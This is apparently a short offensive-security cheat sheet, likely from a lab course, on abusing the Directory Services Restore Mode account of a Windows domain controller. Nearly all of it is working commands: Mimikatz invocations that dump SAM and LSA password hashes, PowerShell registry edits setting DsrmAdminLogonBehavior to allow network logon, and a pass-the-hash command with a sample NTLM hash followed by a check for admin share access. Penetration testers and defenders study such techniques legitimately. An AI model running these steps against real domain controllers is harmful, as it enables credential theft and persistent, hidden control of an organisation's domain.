DSRM

Directory Services Restore Mode (DSRM) is a Safe Mode boot option for Windows Server domain controllers and the main purpose of DSRM is to help system admins log in to the system to restore or repair an AD database. Every Domain controller has local administrator account called "Administrator" and his password is the DSRM password.

Dump DSRM NTLM hash

Require Domain Admin privileges

# dumping from sam - DSRM local Administrator hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# dumping from lsass - Administrator hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Change Logon Behavior

In order to use DSRM account hash we need to change his registry key

# Entering DC session
Enter-PSSession -ComputerName dcorp-dc

# Check if key exists
Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa\' -Name 'DsrmAdminLogonBehavior'

# If exists set his value to 2
Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa\' -Name 'DsrmAdminLogonBehavior' -Value 2 -Verbose

# If does not exist create it and set his value to 2
New-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa\' -Name 'DsrmAdminLogonBehavior' -Value 2 -PropertyType DWORD -Verbose

Passing the hash

# /domain - the domain controller
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator
/ntlm:a102ad5753f4c441e3af31c97fad86fd 
/run:powershell.exe"'


# Check if worked
ls \\dcorp-dc\C$

Last updated 1 year ago

hashtagDump DSRM NTLM hash

hashtagChange Logon Behavior

hashtagPassing the hash

Dump DSRM NTLM hash

Change Logon Behavior

Passing the hash